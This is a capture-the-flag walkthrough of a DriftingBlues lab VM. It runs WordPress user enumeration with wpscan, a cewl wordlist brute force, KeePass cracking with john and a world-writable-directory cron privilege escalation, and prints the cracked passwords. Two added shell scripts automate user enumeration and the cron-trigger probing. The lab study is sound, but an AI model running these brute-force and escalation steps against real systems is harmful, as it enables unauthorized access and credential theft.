Information gathering
Host discovery
arp-scan -l
Port scanning
┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.254.43
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 04:14 EDT
Nmap scan report for 192.168.254.43
Host is up (0.00045s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
MAC Address: 08:00:27:CA:4D:E5 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory scanning
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 100 -b 403,404 -x php,txt,jpg,html,txt,zip -u http://192.168.254.43
===============================================================
/wp-content           (Status: 301) [Size: 321] [--> http://192.168.254.43/wp-content/]
/index.php            (Status: 301) [Size: 0] [--> http://192.168.254.43/]
/wp-login.php         (Status: 200) [Size: 6675]
/license.txt          (Status: 200) [Size: 19915]
/wp-includes          (Status: 301) [Size: 322] [--> http://192.168.254.43/wp-includes/]
/readme.html          (Status: 200) [Size: 7278]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 319] [--> http://192.168.254.43/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://192.168.254.43/wp-login.php?action=register]
Progress: 1245858 / 1245864 (100.00%)
The scan turns up a login page, and the wp-* paths identify the site as WordPress, which suggests two approaches:
- SQL injection
- a WordPress vulnerability scan with wpscan
The one that paid off was using wpscan to enumerate users.
Getting a shell
WPScan usage guide: 吃不胖的ruanruan - 博客园 (cnblogs.com)
wpscan can enumerate the site's usernames; cewl then builds a wordlist from the site's own pages (-d 2 sets the spider depth, -m 4 the minimum word length, --with-numbers keeps words that contain digits), and wpscan tries that list against the enumerated users.
wpscan --url http://192.168.254.43 --enumerate u
[i] User(s) Identified:
[+] abuzerkomurcu
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://192.168.254.43/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
[+] gadd
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] gill
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] collins
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
[+] satanic
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)
Generating the wordlist
┌──(root㉿kali)-[~/blue5]
└─# cewl -d 2 -m 4 -w passwd --with-numbers http://192.168.254.43/
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Next, brute-force the passwords for those users (the usernames themselves are already known; note that wpscan confirmed most of them through wp-login.php's error messages, which differ for unknown and known usernames, so the list is reliable). Save the five names to user.txt and point wpscan at it together with the cewl wordlist:
┌──(root㉿kali)-[~/blue5]
└─# wpscan --url http://192.168.254.43 --usernames user.txt --passwords passwd
[!] Valid Combinations Found:
 | Username: gill, Password: interchangeable
A valid username and password pair.
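The two sources wpscan used to enumerate users above can be reproduced by hand, which is useful when wpscan is not available or its requests are being blocked. The script below is an added example, not part of the original writeup and not wpscan's or the box's code: it queries the wp/v2/users REST endpoint quoted in wpscan's output and follows the /?author=N redirect to /author/<slug>/ that the "Author Id Brute Forcing" check relies on. The target URL is the scanned host; the sample JSON embedded for offline use is constructed, and the author-ID ceiling of 20 is an assumption.

```shell
#!/bin/sh
# Added example (not from the original writeup): enumerate WordPress users
# the way wpscan's "Wp Json Api" and "Author Id Brute Forcing" checks do.
# TARGET is the scanned host; SAMPLE_USERS_JSON is constructed for offline use.

# wp_users_from_json: read a wp/v2/users JSON document on stdin and print one
# user slug per line. The slug is the URL form of the login name and is
# normally identical to it.
wp_users_from_json() {
    # Each user object carries "slug":"<name>"; pull those out without jq.
    tr -d '\n' | grep -o '"slug":"[^"]*"' | sed 's/"slug":"\(.*\)"/\1/'
}

# author_slug_from_location: turn the redirect target WordPress returns for
# /?author=N (e.g. http://host/author/gill/) into the slug "gill".
# Prints nothing when the URL is not an author archive.
author_slug_from_location() {
    printf '%s\n' "$1" | sed -n 's#.*/author/\([^/?]*\).*#\1#p'
}

# enumerate_wp_users TARGET: query both sources against a live site.
# The REST call asks for up to 100 users in one page; the author loop tries
# IDs 1..20 (an assumption) and keeps every ID that redirects to an archive.
# Needs curl and network access; not exercised offline.
enumerate_wp_users() {
    target="${1%/}"
    curl -s "$target/wp-json/wp/v2/users/?per_page=100&page=1" | wp_users_from_json
    i=1
    while [ "$i" -le 20 ]; do
        # %{redirect_url} is curl's write-out variable for the Location target
        loc=$(curl -s -o /dev/null -w '%{redirect_url}' "$target/?author=$i")
        slug=$(author_slug_from_location "$loc")
        if [ -n "$slug" ]; then
            printf '%s\n' "$slug"
        fi
        i=$((i + 1))
    done
}

# Constructed sample, shaped like a wp/v2/users response, so the parser can be
# exercised without the box.
SAMPLE_USERS_JSON='[{"id":1,"name":"abuzerkomurcu","slug":"abuzerkomurcu"},
{"id":2,"name":"Gill","slug":"gill"}]'

# Usage against the box:  sh wpusers.sh http://192.168.254.43
if [ $# -gt 0 ]; then
    enumerate_wp_users "$1" | sort -u
fi
```

The REST endpoint is the quicker of the two sources, but many sites disable it; the author redirect still works on those unless the theme or a plugin suppresses author archives, which is why wpscan reports both.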
Logging into wp-admin as gill, the Media library holds one image; downloading and analyzing it yields an SSH login password.
SSH in directly with it and read user.txt:
ssh gill@ip
gill@driftingblues:~$ cat user.txt
F83FC7429857283616AE62F8B64143E6

Privilege escalation
Next, gill's home directory contains keyfile.kdbx, a KeePass database; a quick search shows keepass2john and john are the tools for it.
keepass2john keyfile.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Press 'q' or Ctrl-C to abort, almost any other key for status
porsiempre       (keyfile)
keepass2 keyfile.kdbx
Open the database with that password; it contains several entries, each with a name and a key.

With no obvious path from here, the usual checklist, one item at a time:
- sudo -l: gill cannot use sudo
- find / -perm -u=s -type f 2>/dev/null: no exploitable SUID binaries
- cron files: nothing usable
- /usr/sbin/getcap -r / 2>/dev/null: no useful capabilities
- find / -writable 2>/dev/null: nothing stood out (in hindsight the world-writable /keyfolder was in that output, buried among the /proc and /dev entries)
Stuck at that point. Only after reading another writeup did I remember my old friends linpeas.sh and pspy64, haha.
linpeas.sh flags a directory in / that has no business being there:
╔══════════╣ Unexpected in root
/vmlinuz.old
/initrd.img
/initrd.img.old
/vmlinuz
/keyfolder
pspy64 shows a cron job that runs /root/key.sh as root once a minute. The script itself is not readable from gill's account, so what it does has to be guessed; following the other writeup, the guess is that it looks for one of the key names from the KeePass database written into /keyfolder.
2024/05/29 07:04:49 CMD: UID=0 PID=1     | /sbin/init
2024/05/29 07:05:01 CMD: UID=0 PID=13750 | /usr/sbin/CRON -f
2024/05/29 07:05:01 CMD: UID=0 PID=13751 | /usr/sbin/CRON -f
2024/05/29 07:05:01 CMD: UID=0 PID=13752 | /bin/sh -c /root/key.sh
2024/05/29 07:05:01 CMD: UID=0 PID=13753 | /bin/bash /root/key.sh
2024/05/29 07:05:49 CMD: UID=0 PID=13754 |
2024/05/29 07:06:01 CMD: UID=0 PID=13755 | /usr/sbin/CRON -f
2024/05/29 07:06:01 CMD: UID=0 PID=13756 | /usr/sbin/CRON -f
2024/05/29 07:06:01 CMD: UID=0 PID=13757 | /bin/sh -c /root/key.sh
2024/05/29 07:06:01 CMD: UID=0 PID=13758 | /bin/bash /root/key.sh
That writeup also shows the condition is strict: the key name must be the only entry in /keyfolder, so the candidates from the database have to be tried one at a time rather than all written at once. The listing below shows why gill can create files there at all: the directory is root-owned but world-writable (drwx---rwx). Creating fracturedocean and waiting for the next cron run:
gill@driftingblues:/keyfolder$ touch fracturedocean
gill@driftingblues:/keyfolder$ ls -la
total 12
drwx---rwx  2 root root 4096 May 29 08:01 .
drwxr-xr-x 19 root root 4096 Feb 24  2021 ..
-rw-r--r--  1 gill gill    0 May 29 07:57 fracturedocean
-rw-r--r--  1 root root   29 May 29 08:01 rootcreds.txt
gill@driftingblues:/keyfolder$ cat rootcreds.txt
root creds

imjustdrifting31
Getting root
root@driftingblues:~# cat root.txt
9EFF53317826250071574B4D4EE56840
Now look at key.sh:
root@driftingblues:~# cat key.sh
#!/bin/bash
if [[ $(ls /keyfolder) == "fracturedocean" ]]; then
        echo "root creds" >> /keyfolder/rootcreds.txt
        echo "" >> /keyfolder/rootcreds.txt
        echo "imjustdrifting31" >> /keyfolder/rootcreds.txt
fi
If the listing of /keyfolder is exactly fracturedocean, the script appends root's password to /keyfolder/rootcreds.txt. Because [[ ... == ... ]] compares the complete output of ls against a single name, any other file in the directory (including a rootcreds.txt from an earlier run) makes the test fail, which is why the candidate names had to be tried singly. A root cron job that takes its trigger from a world-writable directory is an unusual privesc, the first time I'd seen this kind.
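The one-name-at-a-time probing done by hand above, and the exact comparison key.sh makes, can be automated. The following is an added example, not part of the original writeup or of the box: it drops one candidate into /keyfolder, waits for the next cron run, checks whether rootcreds.txt appeared, and removes the marker before trying the next name. The candidate list is assumed to be the entry names from keyfile.kdbx; KEYFOLDER, the 61-second wait and the CRON_HOOK override are assumptions, and key_sh_would_fire is a local re-implementation of the script's test kept only to show why two files at once never match.

```shell
#!/bin/sh
# Added example, not from the original writeup: probe /keyfolder with one
# candidate name at a time. KEYFOLDER, WAIT_SECONDS and the candidate list
# are assumptions; on the box the directory is /keyfolder and the candidates
# are the entry names read out of keyfile.kdbx.

KEYFOLDER="${KEYFOLDER:-/keyfolder}"
WAIT_SECONDS="${WAIT_SECONDS:-61}"   # cron runs /root/key.sh once a minute

# key_sh_would_fire DIR NAME: local re-implementation of the test in key.sh.
# The whole `ls` output is compared with a single name, so a directory that
# holds two files (or a leftover rootcreds.txt) never matches.
key_sh_would_fire() {
    [ "$(ls "$1")" = "$2" ]
}

# wait_for_cron: by default sleep past the next minute boundary. CRON_HOOK
# (an assumption, used for offline testing) replaces the wait with a command
# that stands in for the root cron job.
wait_for_cron() {
    if [ -n "${CRON_HOOK:-}" ]; then
        eval "$CRON_HOOK"
    else
        sleep "$WAIT_SECONDS"
    fi
}

# try_one NAME: put NAME alone in $KEYFOLDER, wait one cron cycle and return
# 0 if rootcreds.txt was written. On failure the marker is removed so the
# next candidate is tested against a clean listing.
try_one() {
    marker="$KEYFOLDER/$1"
    creds="$KEYFOLDER/rootcreds.txt"
    touch "$marker"
    wait_for_cron
    if [ -s "$creds" ]; then
        return 0
    fi
    rm -f "$marker"
    return 1
}

# probe_all NAME...: try the candidates in order, print the matching name and
# the credentials file, return 1 if none of them fired the script.
probe_all() {
    for name in "$@"; do
        if try_one "$name"; then
            echo "match: $name"
            cat "$KEYFOLDER/rootcreds.txt"
            return 0
        fi
    done
    return 1
}

# Usage on the box:  sh probe.sh fracturedocean <other entry names from the kdbx>
if [ $# -gt 0 ]; then
    probe_all "$@"
fi
```

Each wrong guess costs a full cron interval, so the order of the candidate list matters; there is no way to parallelize this because the script's comparison only succeeds on a single-entry listing.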
Takeaways
- information gathering with cewl
- using wpscan
- privilege escalation by inferring what an unreadable cron script does